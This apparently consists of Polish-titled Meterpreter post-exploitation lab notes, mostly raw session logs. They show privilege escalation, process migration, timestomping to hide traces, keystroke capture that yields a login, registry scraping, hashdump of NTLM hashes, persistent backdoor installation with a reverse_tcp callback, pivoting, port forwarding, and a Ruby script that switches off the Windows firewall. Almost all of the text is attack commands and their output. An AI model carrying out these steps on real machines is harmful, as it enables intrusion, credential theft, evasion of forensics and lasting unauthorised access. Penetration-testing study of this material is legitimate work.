Poszerzanie uprawnie i migracja procesu

meterpreter > getsystem h

Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:
    -t <opt>  The technique to use. (Default to '0').

    0 : All techniques available
    1 : Service - Named Pipe Impersonation (In Memory/Admin)
    2 : Service - Named Pipe Impersonation (Dropper/Admin)
    3 : Service - Token Duplication (In Memory/Admin)
    4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getuid
Server username: DARKLORD-PC\DARKLORD

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > migrate 2084
[*] Migrating to 2084...
[*] Migration completed successfully.

-----------------------------------------------------------------------
Konfiguracja wielu kanaw komunikacji z celem

meterpreter > execute h

Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

    -H        Create the process hidden from view.
    -a <opt>  The arguments to pass to the command.
    -c        Channelized I/O (required for interaction).
    -d <opt>  The 'dummy' executable to launch when using -m.
    -f <opt>  The executable command to run.
    -h        Help menu.
    -i        Interact with the process after creating it.
    -k        Execute process on the meterpreters current desktop
    -m        Execute from memory.
    -s <opt>  Execute process in a given session as the session user
    -t        Execute process with currently impersonated thread token

meterpreter > execute -f notepad.exe c

Process 5708 created.
Channel 1 created.

meterpreter > execute -f cmd.exe c

Process 4472 created.
Channel 2 created.

meterpreter > execute -f calc.exe c

Process 6000 created.
Channel 3 created.

meterpreter > write 5

Enter data followed by a '.' on an empty line:

Metasploit!!
.
[*] Wrote 13 bytes to channel 5.

meterpreter > interact 2
Interacting with channel 2...

Microsoft Windows [Version 6.1.7264]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\DARKLORD\Desktop>
------------------------------------------------------------------------

Zacieranie ladw za pomoc polecenia timestomp

meterpreter > timestomp C:\poufne.doc v

Modified      : 2014-04-25 18   :58:24 +0200
Accessed      : 2014-04-25 18:58:24 +0200
Created       : 2014-04-25 18:58:06 +0200
Entry Modified: 2014-04-25 19:01:06 +0200


meterpreter > timestomp C:\poufne.doc -c "3/13/2013 13:13:13"
[*] Setting specific MACE attributes on C:poufne.doc

meterpreter > timestomp C:\poufne.doc -m "3/13/2013 13:13:23"
[*] Setting specific MACE attributes on C:poufne.doc
meterpreter > timestomp C:\poufne.doc -a "3/13/2013 13:13:33"
[*] Setting specific MACE attributes on C:poufne.doc


meterpreter > timestomp C:\poufne.doc v

Modified      : 2013-03-13 13:13:13 +0200
Accessed      : 2013-03-13 13:13:23 +0200
Created       : 2013-03-13 13:13:33 +0200
Entry Modified: 2013-03-13 13:13:13 +0200

-----------------------------------------------------------------------

Polecenie getdesktop oraz przechwytywanie uderze klawiatury

meterpreter > enumdesktops

Enumerating all accessible desktops

Desktops
========

    Session  Station   Name
    -------  -------   ----
    0        WinSta0   Default
    0        WinSta0   Disconnect
    0        WinSta0   Winlogon
    0        SAWinSta  SADesktop

meterpreter > getdesktop
Session 0\Service-0x0-3e7$\Default

meterpreter > getdesktop

Session 0\Service-0x0-3e7$\Default

meterpreter > setdesktop
Changed to desktop WinSta0\Default

meterpreter > getdesktop
Session 0\WinSta0\Default

meterpreter > keyscan_start
Starting the keystroke sniffer...

meterpreter > keyscan_dump
Dumping captured keystrokes...

gmail.com <Return> daklord <Tab> 123123


meterpreter > migrate 1180
[*] Migrating to 1180...
[*] Migration completed successfully.

meterpreter > getdesktop
Session 0\WinSta0\Winlogon

meterpreter > migrate 884
[*] Migrating to 884...
[*] Migration completed successfully.

meterpreter > getdesktop
Session 0\WinSta0\Default
---------------------------------------------------------------

Korzystanie ze skryptu scraper Meterpretera

meterpreter > run scraper

[*] New session on 192.168.56.1:4232...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Users\DARKLORD\AppData\Local\Temp\UKWKdpIb.reg)
-------------------------------------------------------------------------

Technika pass the hash

meterpreter > getuid
Server username: DARKLORD-PC\DARKLORD

meterpreter > getsystem
...got system (via technique 4).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 78e1241e98c23002bc85fd94c146309d...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DARKLORD:1000:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::
----------------------------------------------------------------------------------

Ustanawianie trwaego poczenia za pomoc backdoorw

meterpreter > run metsvc -h

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the service
    -h        This help menu
    -r        Uninstall an existing Meterpreter service (files must be deleted manually)


meterpreter > run metsvc A

[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\DARKLORD\AppData\Local\Temp\ygLFhIFX...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
	 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.


meterpreter > run persistence h

Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to..
    -L <opt>  Location in target host where to write payload to..
    -P <opt>  Payload to use, default is    
    -S        Automatically start the agent on boot as a service 
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection 
    -p <opt>  The port on the remote host where Metasploit..
    -r <opt>  The IP of the system running Metasploit listening..


meterpreter > run persistence -A -S -U -i 60 -p 4321 r 192.168.56.101
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DARKLORD-PC_20111227.0307/DARKLORD-PC_20111227.0307.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4321
[*] Persistent agent script is 610795 bytes long
[+] Persistent Script written to C:\Users\DARKLORD\AppData\Local\Temp\LHGtjzB.vbs
[*] Starting connection handler at port 4321 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script C:\Users\DARKLORD\AppData\Local\Temp\LHGtjzB.vbs
[+] Agent executed with PID 5712
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DBDalcOoYlqJSi
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DBDalcOoYlqJSi
[*] Installing as service..
[*] Creating service cpvPbOfXj
------------------------------------------------------------------------------

Pivoting z wykorzystaniem Meterpretera 

meterpreter > run arp_scanner -r 10.0.2.1/24

[*] ARP Scanning 10.0.2.1/24
[*] IP: 10.0.2.7 MAC 8:26:18:41:fb:33
[*] IP: 10.0.2.9 MAC 41:41:41:41:41:41
meterpreter > background
msf  exploit(handler) > route add 10.0.2.15 255.255.255.0 1

[*] Route added

msf  exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.2.15          255.255.255.0      Session 1

--------------------------------------------------------------------------------------

Przekierowanie portw za pomoc Meterpretera

msf  exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.2.15          255.255.255.0      Session 1

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  The local host to listen on (optional).
    -h        Help banner.
    -l <opt>  The local port to listen on.
    -p <opt>  The remote port to connect to.
    -r <opt>  The remote host to connect to.

meterpreter > portfwd add -l 4321 -p 80 -r 10.0.2.7

[*] Local TCP relay created: 0.0.0.0:4321 <-> 10.0.2.7:80
---------------------------------------------------------------------------------------------

Budowanie skryptu Meterpretera Dezaktywator firewalla systemu Windows

# Dezaktywator firewalla systemu Windows

# Parsowanie opcji oraz parametrw

opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Menu pomocy." ]
)

opts.parse(args) { |opt, idx, val|
  case opt
  when "-h"
    print_line "Skrypt Meterpretera wyczajcy domylny firewall systemu Windows"
    print_line "Miejmy nadziej, e to zadziaa"
    print_line(opts.usage)
    raise Rex::Script::Completed
  end
}

# Weryfikacja systemu operacyjnego i wykonanie polecenia

unsupported if client.platform !~ /win32|win64/i  
  begin
    print_status("wyczanie domylnego firewalla")
    cmd_exec('cmd /c','netsh advfirewall set AllProfiles state off',5)
  end



